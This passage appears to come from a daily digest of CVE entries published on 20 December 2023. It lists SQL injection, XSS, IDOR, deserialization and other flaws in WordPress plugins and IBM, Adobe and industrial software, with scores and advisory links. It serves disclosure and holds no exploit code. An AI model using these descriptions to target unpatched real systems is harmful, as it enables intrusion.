First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions.This issue affects Woo Subscriptions: from n/a through 5.1.2.

CVE ID : CVE-2023-35914
Source : audit@patchstack.com
CVSS Score : 7.5

References :
https://patchstack.com/database/vulnerability/woocommerce-subscriptions/wordpress-woocommerce-subscriptions-plugin-5-1-2-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-35916

First published on : 20-12-2023 16:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments โ€“ Fully Integrated Solution Built and Supported by Woo.This issue affects WooPayments โ€“ Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0.

CVE ID : CVE-2023-35916
Source : audit@patchstack.com
CVSS Score : 7.5

References :
https://patchstack.com/database/vulnerability/woocommerce-payments/wordpress-woocommerce-payments-plugin-5-9-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-46147

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Deserialization of Untrusted Data vulnerability in Themify Themify Ultra.This issue affects Themify Ultra: from n/a through 7.3.5.

CVE ID : CVE-2023-46147
Source : audit@patchstack.com
CVSS Score : 7.4

References :
https://patchstack.com/database/vulnerability/themify-ultra/wordpress-themify-ultra-theme-7-3-3-authenticated-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-47507

First published on : 20-12-2023 14:15:21
Last modified on : 20-12-2023 14:33:33

Description :
Deserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro.This issue affects Master Slider Pro: from n/a through 3.6.5.

CVE ID : CVE-2023-47507
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/masterslider/wordpress-master-slider-pro-plugin-3-6-5-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-26525

First published on : 20-12-2023 18:15:11
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs Dokan โ€“ Best WooCommerce Multivendor Marketplace Solution โ€“ Build Your Own Amazon, eBay, Etsy.This issue affects Dokan โ€“ Best WooCommerce Multivendor Marketplace Solution โ€“ Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12.

CVE ID : CVE-2023-26525
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/dokan-lite/wordpress-dokan-plugin-3-7-12-authenticated-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-28788

First published on : 20-12-2023 18:15:12
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Page Visit Counter Advanced Page Visit Counter โ€“ Most Wanted Analytics Plugin for WordPress.This issue affects Advanced Page Visit Counter โ€“ Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2.

CVE ID : CVE-2023-28788
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/advanced-page-visit-counter/wordpress-advanced-page-visit-counter-plugin-6-4-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Source : hq.dhs.gov

Vulnerability ID : CVE-2023-6689

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application.

CVE ID : CVE-2023-6689
Source : ics-cert@hq.dhs.gov
CVSS Score : 8.2

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-02 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-352


Source : ncsc.ch

Vulnerability ID : CVE-2023-0011

First published on : 20-12-2023 08:15:43
Last modified on : 20-12-2023 13:50:15

Description :
A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2 which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well.. This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280.

CVE ID : CVE-2023-0011
Source : vulnerability@ncsc.ch
CVSS Score : 7.6

References :
https://www.u-blox.com/en/report-security-issues | source : vulnerability@ncsc.ch

Vulnerability : CWE-20


Source : apache.org

Vulnerability ID : CVE-2023-37544

First published on : 20-12-2023 09:15:07
Last modified on : 20-12-2023 13:50:15

Description :
Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions.

CVE ID : CVE-2023-37544
Source : security@apache.org
CVSS Score : 7.5

References :
http://www.openwall.com/lists/oss-security/2023/12/20/2 | source : security@apache.org
https://lists.apache.org/thread/od0k9zts1toc9h9snbqq4pjpyx28mv4m | source : security@apache.org

Vulnerability : CWE-287


Source : m-files.com

Vulnerability ID : CVE-2023-6912

First published on : 20-12-2023 10:15:08
Last modified on : 20-12-2023 13:50:15

Description :
Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords.

CVE ID : CVE-2023-6912
Source : security@m-files.com
CVSS Score : 7.5

References :
https://www.m-files.com/about/trust-center/security-advisories/cve-2023-6912/ | source : security@m-files.com

Vulnerability : CWE-307


Source : google.com

Vulnerability ID : CVE-2023-6562

First published on : 20-12-2023 13:15:07
Last modified on : 20-12-2023 13:50:15

Description :
JPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially-crafted the image that is displayed back to the attacker.

CVE ID : CVE-2023-6562
Source : cve-coordination@google.com
CVSS Score : 7.5

References :
https://github.com/google/security-research/security/advisories/GHSA-g6qc-fhcq-vhf9 | source : cve-coordination@google.com

Vulnerability : CWE-22


Source : github.com

Vulnerability ID : CVE-2023-50249

First published on : 20-12-2023 14:15:21
Last modified on : 20-12-2023 14:33:33

Description :
Sentry-Javascript is official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry's Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0.

CVE ID : CVE-2023-50249
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/getsentry/sentry-javascript/commit/fe24eb5eefa9d27b14b2b6f9ebd1debca1c208fb | source : security-advisories@github.com
https://github.com/getsentry/sentry-javascript/pull/9815 | source : security-advisories@github.com
https://github.com/getsentry/sentry-javascript/security/advisories/GHSA-x3v3-8xg8-8v72 | source : security-advisories@github.com

Vulnerability : CWE-400


Vulnerability ID : CVE-2023-47118

First published on : 20-12-2023 17:15:08
Last modified on : 20-12-2023 19:52:41

Description :
ClickHouseยฎ is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this exploit can also be triggered via HTTP protocol, however, the attacker will need a valid credential as the HTTP authentication take places first. This issue has been fixed in version 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts.

CVE ID : CVE-2023-47118
Source : security-advisories@github.com
CVSS Score : 7.0

References :
https://github.com/ClickHouse/ClickHouse/security/advisories/GHSA-g22g-p6q2-x39v | source : security-advisories@github.com

Vulnerability : CWE-122


(36) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : patchstack.com

Vulnerability ID : CVE-2023-28491

First published on : 20-12-2023 18:15:11
Last modified on : 20-12-2023 19:52:41

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tribulant Slideshow Gallery LITE.This issue affects Slideshow Gallery LITE: from n/a through 1.7.6.

CVE ID : CVE-2023-28491
Source : audit@patchstack.com
CVSS Score : 6.7

References :
https://patchstack.com/database/vulnerability/slideshow-gallery/wordpress-slideshow-gallery-lite-plugin-1-7-6-sql-injection?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-31092

First published on : 20-12-2023 16:15:07
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Foxskav Easy Bet.This issue affects Easy Bet: from n/a through 1.0.2.

CVE ID : CVE-2023-31092
Source : audit@patchstack.com
CVSS Score : 5.5

References :
https://patchstack.com/database/vulnerability/easy-bet/wordpress-easy-bet-plugin-1-0-2-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-32128

First published on : 20-12-2023 16:15:07
Last modified on : 20-12-2023 16:47:19

Description :
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box โ€“ Accept Payments in any Cryptocurrency on your WP Site for Free.This issue affects Cryptocurrency Payment & Donation Box โ€“ Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7.

CVE ID : CVE-2023-32128
Source : audit@patchstack.com
CVSS Score : 5.5

References :
https://patchstack.com/database/vulnerability/cryptocurrency-donation-box/wordpress-cryptocurrency-payment-donation-box-plugin-2-2-5-sql-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2022-47599

First published on : 20-12-2023 18:15:11
Last modified on : 20-12-2023 19:52:41

Description :
Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager โ€“ 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager.This issue affects File Manager โ€“ 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7.

CVE ID : CVE-2022-47599
Source : audit@patchstack.com
CVSS Score : 5.5

References :
https://patchstack.com/database/vulnerability/file-manager/wordpress-bit-file-manager-100-free-file-manager-for-wordpress-plugin-5-2-7-php-object-injection?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2023-38513

First published on : 20-12-2023 14:15:19
Last modified on : 20-12-2023 14:33:33

Description :
Authorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom).This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5.

CVE ID : CVE-2023-38513
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/wplr-sync/wordpress-photo-engine-plugin-6-2-5-insecure-direct-object-references-idor?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-36520

First published on : 20-12-2023 15:15:08
Last modified on : 20-12-2023 16:47:19

Description :
Authorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar.This issue affects Editorial Calendar: from n/a through 3.7.12.

CVE ID : CVE-2023-36520
Source : audit@patchstack.com
CVSS Score : 5.4

References :
https://patchstack.com/database/vulnerability/editorial-calendar/wordpress-editorial-calendar-plugin-3-7-12-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2023-41796

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Authorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers.This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0.

CVE ID : CVE-2023-41796
Source : audit@patchstack.com
CVSS Score : 5.3

References :
https://patchstack.com/database/vulnerability/sunshine-photo-cart/wordpress-sunshine-photo-cart-plugin-2-9-25-order-manipulation-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


Vulnerability ID : CVE-2022-47597

First published on : 20-12-2023 18:15:11
Last modified on : 20-12-2023 19:52:41

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker โ€“ Popup for opt-ins, lead gen, & more.This issue affects Popup Maker โ€“ Popup for opt-ins, lead gen, & more: from n/a through 1.17.1.

CVE ID : CVE-2022-47597
Source : audit@patchstack.com
CVSS Score : 5.3

References :
https://patchstack.com/database/vulnerability/popup-maker/wordpress-popup-maker-plugin-1-17-1-unauth-access-to-debug-log?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Source : us.ibm.com

Vulnerability ID : CVE-2023-47706

First published on : 20-12-2023 01:15:07
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341.

CVE ID : CVE-2023-47706
Source : psirt@us.ibm.com
CVSS Score : 6.6

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271341 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2023-35895

First published on : 20-12-2023 15:15:08
Last modified on : 20-12-2023 16:47:19

Description :
IBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116.

CVE ID : CVE-2023-35895
Source : psirt@us.ibm.com
CVSS Score : 6.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/259116 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7099762 | source : psirt@us.ibm.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2023-42012

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
An IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509.

CVE ID : CVE-2023-42012
Source : psirt@us.ibm.com
CVSS Score : 6.2

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/265509 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7096548 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47707

First published on : 20-12-2023 02:15:44
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522.

CVE ID : CVE-2023-47707
Source : psirt@us.ibm.com
CVSS Score : 5.4

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271522 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-42013

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510.

CVE ID : CVE-2023-42013
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/265510 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7096547 | source : psirt@us.ibm.com

Vulnerability : CWE-209


Vulnerability ID : CVE-2023-47161

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799.

CVE ID : CVE-2023-47161
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/270799 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7096552 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47703

First published on : 20-12-2023 02:15:44
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197.

CVE ID : CVE-2023-47703
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271197 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-209


Vulnerability ID : CVE-2023-47702

First published on : 20-12-2023 02:15:43
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view modify files on the system. IBM X-Force ID: 271196.

CVE ID : CVE-2023-47702
Source : psirt@us.ibm.com
CVSS Score : 4.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271196 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-47705

First published on : 20-12-2023 02:15:44
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228.

CVE ID : CVE-2023-47705
Source : psirt@us.ibm.com
CVSS Score : 4.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271228 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47704

First published on : 20-12-2023 01:15:07
Last modified on : 20-12-2023 13:50:15

Description :
IBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220.

CVE ID : CVE-2023-47704
Source : psirt@us.ibm.com
CVSS Score : 4.0

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271220 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7091157 | source : psirt@us.ibm.com

Vulnerability : CWE-798


Source : incibe.es

Vulnerability ID : CVE-2023-6769

First published on : 20-12-2023 10:15:08
Last modified on : 20-12-2023 13:50:15

Description :
Stored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the "lp_admin.php" file in the "question" and "item" parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading.

CVE ID : CVE-2023-6769
Source : cve-coordination@incibe.es
CVSS Score : 6.5

References :
https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-amazing-little-poll | source : cve-coordination@incibe.es

Vulnerability : CWE-79


Source : m-files.com

Vulnerability ID : CVE-2023-6910

First published on : 20-12-2023 10:15:08
Last modified on : 20-12-2023 13:50:15

Description :
A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. Authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests.

CVE ID : CVE-2023-6910
Source : security@m-files.com
CVSS Score : 6.5

References :
https://www.m-files.com/about/trust-center/security-advisories/cve-2023-6910 | source : security@m-files.com

Vulnerability : CWE-400


Source : microsoft.com

Vulnerability ID : CVE-2022-44684

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Windows Local Session Manager (LSM) Denial of Service Vulnerability

CVE ID : CVE-2022-44684
Source : secure@microsoft.com
CVSS Score : 6.5

References :
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-44684 | source : secure@microsoft.com


Source : hq.dhs.gov

Vulnerability ID : CVE-2023-50703

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
An attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application.

CVE ID : CVE-2023-50703
Source : ics-cert@hq.dhs.gov
CVSS Score : 6.3

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-03 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-319


Vulnerability ID : CVE-2023-50705

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
An attacker could create malicious requests to obtain sensitive information about the web server.

CVE ID : CVE-2023-50705
Source : ics-cert@hq.dhs.gov
CVSS Score : 5.3

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-03 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-200


Vulnerability ID : CVE-2023-50704

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
An attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users.

CVE ID : CVE-2023-50704
Source : ics-cert@hq.dhs.gov
CVSS Score : 4.3

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-03 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-601


Vulnerability ID : CVE-2023-50706

First published on : 20-12-2023 00:15:09
Last modified on : 20-12-2023 13:50:26

Description :
A user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens.

CVE ID : CVE-2023-50706
Source : ics-cert@hq.dhs.gov
CVSS Score : 4.1

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-353-03 | source : ics-cert@hq.dhs.gov

Vulnerability : CWE-284


Source : adobe.com

Vulnerability ID : CVE-2023-51457

First published on : 20-12-2023 14:15:21
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victimโ€™s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-51457
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51458

First published on : 20-12-2023 14:15:21
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victimโ€™s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-51458
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51459

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-51459
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51460

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victimโ€™s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-51460
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51461

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victimโ€™s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-51461
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-51462

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-51462
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79


Source : fluidattacks.com

Vulnerability ID : CVE-2023-49269

First published on : 20-12-2023 18:15:13
Last modified on : 20-12-2023 19:52:34

Description :
Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'adults' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.

CVE ID : CVE-2023-49269
Source : help@fluidattacks.com
CVSS Score : 5.4

References :
https://fluidattacks.com/advisories/lang/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49270

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_in_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.

CVE ID : CVE-2023-49270
Source : help@fluidattacks.com
CVSS Score : 5.4

References :
https://fluidattacks.com/advisories/lang/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49271

First published on : 20-12-2023 20:15:19
Last modified on : 20-12-2023 20:15:19

Description :
Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_out_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.

CVE ID : CVE-2023-49271
Source : help@fluidattacks.com
CVSS Score : 5.4

References :
https://fluidattacks.com/advisories/lang/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49272

First published on : 20-12-2023 20:15:20
Last modified on : 20-12-2023 20:15:20

Description :
Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'children' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.

CVE ID : CVE-2023-49272
Source : help@fluidattacks.com
CVSS Score : 5.4

References :
https://fluidattacks.com/advisories/lang/ | source : help@fluidattacks.com
https://www.kashipara.com/ | source : help@fluidattacks.com

Vulnerability : CWE-79


Source : progress.com

Vulnerability ID : CVE-2023-6784

First published on : 20-12-2023 14:15:22
Last modified on : 20-12-2023 14:33:33

Description :
A malicious user could potentially use the Sitefinity system for the distribution of phishing emails.

CVE ID : CVE-2023-6784
Source : security@progress.com
CVSS Score : 4.7

References :
https://community.progress.com/s/article/Sitefinity-Security-Advisory-for-Addressing-Security-Vulnerability-CVE-2023-6784-December-2023 | source : security@progress.com
https://www.progress.com/sitefinity-cms | source : security@progress.com

Vulnerability : CWE-20


(1) LOW VULNERABILITIES [0.1, 3.9]

Source : patchstack.com

Vulnerability ID : CVE-2023-46311

First published on : 20-12-2023 14:15:20
Last modified on : 20-12-2023 14:33:33

Description :
Authorization Bypass Through User-Controlled Key vulnerability in gVectors Team Comments โ€“ wpDiscuz.This issue affects Comments โ€“ wpDiscuz: from n/a through 7.6.3.

CVE ID : CVE-2023-46311
Source : audit@patchstack.com
CVSS Score : 2.7

References :
https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-639


(17) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : mitre.org

Vulnerability ID : CVE-2023-45887

First published on : 20-12-2023 00:15:08
Last modified on : 20-12-2023 13:50:26

Description :
